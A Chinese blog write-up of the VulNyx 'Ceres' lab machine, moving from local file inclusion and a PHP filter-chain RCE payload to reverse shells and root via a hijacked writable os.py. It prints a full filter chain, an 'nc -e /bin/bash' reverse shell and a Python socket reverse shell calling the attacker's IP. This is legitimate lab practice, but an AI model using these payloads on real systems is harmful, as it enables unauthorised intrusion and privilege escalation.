首页 > 其他分享 >VulNyx - Ceres 靶机

VulNyx - Ceres 靶机

时间:2024-08-25 09:07:22浏览次数:10  
标签:iconv Ceres UTF7 UTF8 base64 VulNyx convert decode 靶机

image
有80端口



访问看看
image



他这个挺奇葩的看了wp才知道 file.php的参数是file
他会自动给你加上php 也就是说file=secret.php读不到数据要file=secret才能读到数据



伪协议读取文件
image
<?php include($_GET["file"].".php"); ?>
image
<?php system("id"); // /My_H1dd3n_S3cr3t ?>
/My_H1dd3n_S3cr3t是个路径
扫描一下
也有file.php 参数也是file 但是这个不会自动加.php

理论上我们这里可以直接用伪协议rce了但是还是不行,应该是被过滤了
那么我们就用php_filter_chain_generator脚本构造一个伪协议链

php://filter/convert.iconv.UTF8.CSISO2022KR|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16|convert.iconv.WINDOWS-1258.UTF32LE|convert.iconv.ISIRI3342.ISO-IR-157|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSA_T500.UTF-32|convert.iconv.CP857.ISO-2022-JP-3|convert.iconv.ISO2022JP2.CP775|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.IBM891.CSUNICODE|convert.iconv.ISO8859-14.ISO6937|convert.iconv.BIG-FIVE.UCS-4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.ISO88597.UTF16|convert.iconv.RK1048.UCS-4LE|convert.iconv.UTF32.CP1167|convert.iconv.CP9066.CSUCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UNICODE|convert.iconv.ISIRI3342.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSGB2312.UTF-32|convert.iconv.IBM-1161.IBM932|convert.iconv.GB13000.UTF16BE|convert.iconv.864.UTF-32LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.851.UTF-16|convert.iconv.L1.T.618BIT|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UCS2.UTF8|convert.iconv.8859_3.UCS2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP367.UTF-16|convert.iconv.CSIBM901.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.PT.UTF32|convert.iconv.KOI8-U.IBM-932|convert.iconv.SJIS.EUCJP-WIN|convert.iconv.L10.UCS4|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.UTF8.CSISO2022KR|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.863.UTF-16|convert.iconv.ISO6937.UTF16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.864.UTF32|convert.iconv.IBM912.NAPLPS|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP861.UTF-16|convert.iconv.L4.GB13000|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.GBK.BIG5|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.865.UTF16|convert.iconv.CP901.ISO6937|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP-AR.UTF16|convert.iconv.8859_4.BIG5HKSCS|convert.iconv.MSCP1361.UTF-32LE|convert.iconv.IBM932.UCS-2BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L6.UNICODE|convert.iconv.CP1282.ISO-IR-90|convert.iconv.ISO6937.8859_4|convert.iconv.IBM868.UTF-16LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.L4.UTF32|convert.iconv.CP1250.UCS-2|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM921.NAPLPS|convert.iconv.855.CP936|convert.iconv.IBM-932.UTF-8|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.8859_3.UTF16|convert.iconv.863.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF16|convert.iconv.ISO6937.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CP1046.UTF32|convert.iconv.L6.UCS-2|convert.iconv.UTF-16LE.T.61-8BIT|convert.iconv.865.UCS-4LE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.MAC.UTF16|convert.iconv.L8.UTF16BE|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.CSIBM1161.UNICODE|convert.iconv.ISO-IR-156.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.INIS.UTF16|convert.iconv.CSIBM1133.IBM943|convert.iconv.IBM932.SHIFT_JISX0213|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.iconv.SE2.UTF-16|convert.iconv.CSIBM1161.IBM-932|convert.iconv.MS932.MS936|convert.iconv.BIG5.JOHAB|convert.base64-decode|convert.base64-encode|convert.iconv.UTF8.UTF7|convert.base64-decode/resource=php://temp

反弹shell
a=nc -e /bin/bash 192.168.200.2 2333




getshell
image




sudo -l 查看可执行命令
image




python提权
image



先建立个ssh证书登录先
mkdir .ssh
cd .ssh
将自己的公钥写入authorized_keys
image



image
登录成功




运行linepeas.sh脚本(wget得来的)

发现os.py具有可写入权限
image
这就很有意思了因为只要有python import os模块 os.py就会执行而我们又有os.py的改写权限
那么如果有一个进程正在以root权限执行了一个py程序而这个py程序里面有恰巧import 了os模块的话我们就可以提权成功了




运行一下pspy (wget得到的)这个脚本就是查看正在运行的进程有哪些
发现真的有个 /opt/important.py的脚本正在运行 那我们只要在os.py写入反弹shell就OK了
image




反弹shell脚本
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.200.2",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);



将shell脚本粘贴到最后
image




nc 监听
image

提权成功

标签:iconv,Ceres,UTF7,UTF8,base64,VulNyx,convert,decode,靶机
From: https://www.cnblogs.com/wssw/p/18378098

相关文章

  • NYX靶机笔记
    NYX靶机笔记概述VulnHub里的简单靶机靶机地址:https://download.vulnhub.com/nyx/nyxvm.zip1、nmap扫描1)主机发现#-sn只做ping扫描,不做端口扫描nmap-sn192.168.84.1/24#发现靶机ip为MACAddress:00:50:56:E0:D5:D4(VMware)Nmapscanreportfor192.168.84.137......
  • VulNyx-Secrets
    扫端口扫描80端口发现有个secrets目录还有个注释继续扫发现http://192.168.200.11/secrets/login_form.php有这个登录框估计就是要爆破username就是brad了把密码爆破出来bradley登录完成后有跳转要我们写ip随便写个127.0.0.1发现他只接受纯数字那我们......
  • VulNyx - Responder
    靶机ip192.168.200.9先nmap扫描全端口这个22端口不知道有没有开被过滤了我们收集一下靶机的ipv6地址nmap用ipv6地址扫他的端口就能绕过他的端口过滤ping6ff02::1收集ipv6地址可以看到其实他的22端口就是开的访问80端口没啥东西dirsearch扫描一下啥东西......
  • Vulnhub靶机:AI-WEB-1.0
    一.网站查询二.扫描当前网站目录 扫出有http://172.16.1.88/robots.txt继续扫这个刚扫出来的,然后得出 我们再访问m3dinfo/info.php和 /se3reTdir777/这俩目录 得到如上图所示三.进行sql注入1.判断是否有sql注入 /有结果,有报错 2.利用burp抓包进行注入......
  • HTB-BoardLight靶机笔记
    BoardLight靶机笔记概述HTB的靶机BoardLight靶机地址:https://app.hackthebox.com/machines/BoardLight一、nmap扫描1)端口扫描-sTtcp全连接扫描--min-rate以最低速率10000扫描-p-扫描全端口sudonmap-sT--min-rate10000-p--oports10.10.11.11Warning:10.1......
  • SAR靶机笔记
    SAR靶机笔记概述SAR是Vulnhub上的靶机,大家可以去vulnhub网站上去进行下载。这里有链接:https://download.vulnhub.com/sar/sar.zip一丶常规的nmap扫描1)主机发现sn只做ping扫描,不做端口扫描nmap-sn192.168.84.1/24MACAddress:00:50:56:FA:CB:D3(VMware)N......
  • 一些免费好用的靶机渗透测试环境
    1、Vulhub:(各种漏洞环境集合,一键搭建漏洞测试靶场)https://vulhub.org/(在线版)https://github.com/vulhub/vulhub(离线版)2、Vulnhub:(国外实战靶场,适合入门提高)https://www.vulnhub.com/3、Vulnstack(红队实战靶场,域、横向渗透、多层网络,强烈推荐,目前共7个靶场,网上writeup......
  • Vulnhub JIS-CTF靶机详解
    项目地址https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/修改靶机的网卡开机时长按shift,进入此页面选择root模式进入将只读模式改为读写模式mount-oremount,rw/查看本机的网卡名称ifconfig-a修......
  • sp eric靶机
    扫描IP端口扫描nmap192.168.111.146-p--sV目录扫描#使用命令dirsearch-u"http://192.168.111.146"访问靶机IP地址拼接访问admin.php,发现登录框界面,尝试sql注入,弱口令等,没有结果看看.git,使用githack下载源码#使用命令python2GitHack.py-uh......
  • Broken靶机
    查看靶机的mac地址使用kail进行扫描ip探测靶机主机,端口,服务nmap-sS-sS-A-p-192.168.154.137进行目录扫描dirsearch-uhttp://192.168.154.137拼接后没什么发现访问靶机ip访问readme.md发现是十六进制的值将内容写入到readme.md中使用xxd转换xxd-r-......